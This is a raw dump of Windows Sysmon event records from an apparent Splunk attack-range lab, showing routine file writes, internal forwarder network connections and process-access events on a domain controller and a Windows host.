23542300x8000000000000000299842Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:31.155{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72D3695FCA293B730AA86C4DB6B2CCAC,SHA256=4ADAFE972051FA01ACA769F0169B512C4C56BB48D49E9F5AE7478B68278058BB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223565Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:29.650{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51797-false10.0.1.12-8000- 23542300x8000000000000000223570Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:32.895{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D40B4C76B39512050EF5D5F099B562F0,SHA256=E16F68226EDB4EAC8547CFB544843C6436DB39AEE117EF702D0DF6ED445DF688,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299843Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:32.170{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E0599099F7DE2CBB7538FA1E9A74410,SHA256=E6165F0D17897783B512F13CA851976E276DE4FA23D950619822CBFBE8E72D2D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000223569Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:32.739{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11C-6215-1300-000000003902}832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223568Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:32.739{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11C-6215-1300-000000003902}832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223567Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:32.739{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11C-6215-1300-000000003902}832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000299846Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:33.708{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=60E7FA340B7502CC912284EAD5CC061B,SHA256=B9C7F31F712C83C66597661038D28EE78C0642534B522FDA3A1D5B393628F1FA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299845Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:30.569{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49658-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000299844Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:33.189{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02E80FCC5478B228ECB6E4B429F5C177,SHA256=AD0008100F906BBAB76B220A350DF4BE38CB7AAC87BA31DBC18D6D4C399641D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299848Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:34.555{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=9E27A577B6625EC7E51E86AB2009F504,SHA256=2868F01A372BA3D09D70DB83B09D3303E5C0651D003B92C64280A84EC6514B80,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299847Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:34.208{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=827296E3D75A757B8A8488C0A0B9CD19,SHA256=4D0D050A6913E2C0D9A575D18FE3B808C8030249E743601AEB5005995CDC29C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223571Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:34.114{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B09575FB34CB9A52BC6A72A145F8366D,SHA256=1375404951CBD8C7226265E6032035706748DF454D1C11E61D579FE3BD8235EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223572Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:35.332{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7897A129A5C5AA19E889054FA9BF45E,SHA256=35657156823D06FEBC28132099CC5D5720DBCC6FA1AEFC02CF467255C029DE3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299849Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:35.240{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F198547A7944396ED6D6F57DD6B98969,SHA256=514820462B764EF5328E8277D937EE3DF7777BD4E25C34E66B6900F0E991BA53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223573Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:36.567{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7ACCC41471C8272BFAB925FD157F6ED1,SHA256=499A60EF9FFC737AA0B0C8177EE3730890BBEE28D76D1FDFABD7BFB420222C3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299850Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:36.240{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=849AE8B168908624E9B01E0CF4ADA536,SHA256=314172E89CD94F9091242F4D7CDA2D4A58A14DFE617185C31E550F9F9B38FB63,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223575Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:35.509{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51798-false10.0.1.12-8000- 23542300x8000000000000000223574Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:37.582{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=441E5ECCC04F5EE85568783B3F0A6B74,SHA256=CE6C6F99B75C7313E2E6CEA46AE0A9E09BA773498E114D058382C1E7E0D34E52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299851Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:37.271{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57BD038F79BAC700C1462415CF441C06,SHA256=AE14E1699EF3981B9B72C9C6DF224AB0B9060DDEA452D21EE3CBCC99BCFDDB99,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223576Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:38.598{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E0F49BE9ABDA8CBCB840186E0149B00,SHA256=0B4C3EC8C4463CEF9271C9FC2CC89FCC386D1F24525905EB533881DBB6FFBA36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299852Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:38.272{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3487CC7A2A6DED6537D8133197E1E5D,SHA256=9EF4901A3DB781A6A1A49B3E85A40C9B0E184B60785AE02A474312385D69416E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223577Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:39.816{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AC28FFF394746A2E545CC132471984B,SHA256=4974EBE30F0D6809EA928E17688422AC616B25CCCBA3EEFEC8873A767AF5BCFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299854Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:39.291{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E40D505340D89B4594C792EBC0B3D7A3,SHA256=895966EB15DF570AB2E60F9B242FA804680263B117167EED31FB695F7C888D97,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299853Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:36.547{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49659-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000223578Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:40.941{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C1BC58912D636F2A172506667D6EF6C,SHA256=E582FD1BD26E5215F3C516CF5D5A1AFDC72A3CA886AD20056BC8A83DDB734E65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299856Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:40.809{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299855Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:40.308{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82B95F1E1D4AA322E417B495E9C97D9B,SHA256=049F9EAF3DB62F10264BF02B9682180EB7F24372A7EB12C8924DDC989C2DF733,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223579Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:41.957{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=057B769EA2D7321651019E719FA3A059,SHA256=A8D0785B429C6D37FE0AEFC2E69786B37FC6C2ED942FC13EF167D6618ED34EBB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299857Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:41.308{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=227FE044FCBD62C245FC7B5F46D12F8A,SHA256=DCF595FACB2A776784779118B7BB44100807A73B23DE2854D9A694B96219359D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299859Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:40.249{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49660-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000299858Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:42.309{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57F0E4FF03712EB5D1EB344580909417,SHA256=A33B426854987A69B33BBBFEC44DC178E13AEA0DCA7F9EFF6707E436C889660E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299860Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:29:43.324{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4F4F7C43BB9EC494B6F7C377C796C62,SHA256=6F8FABF2CBB08EBB489F0A65C6DBBF9420208526F77A6D588936B6357D738DD6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223580Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:43.175{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8AC4197530F118EEE76E6F2EE47302C,SHA256=FE7B9CC3959F230661702C15CF37D2BA59CDFA4458F83A745E9662E4B5E3FBE0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000223609Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:44.894{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1AA8-6216-6B05-000000003902}1812C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223608Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:44.894{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223607Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:44.894{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223606Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:44.894{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223605Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:44.894{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223604Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:44.894{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223603Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:29:44.894{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 